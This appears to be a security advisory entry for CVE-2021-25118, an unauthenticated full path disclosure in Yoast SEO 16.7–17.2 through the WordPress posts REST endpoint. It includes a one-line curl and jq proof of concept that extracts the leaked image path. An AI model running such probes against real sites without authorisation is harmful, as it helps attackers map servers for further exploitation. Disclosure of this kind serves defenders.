[CVE-2021-25118] Yoast SEO 16.7-17.2 - Unauthenticated Full Path Disclosure
Description
The Yoast SEO WordPress plugin from versions 16.7 until 17.2 discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
Proof of Concept
curl -s 'https://example.com/wp-json/wp/v2/posts?per_page=1' | jq '.[0].yoast_head_json.og_image[0].path'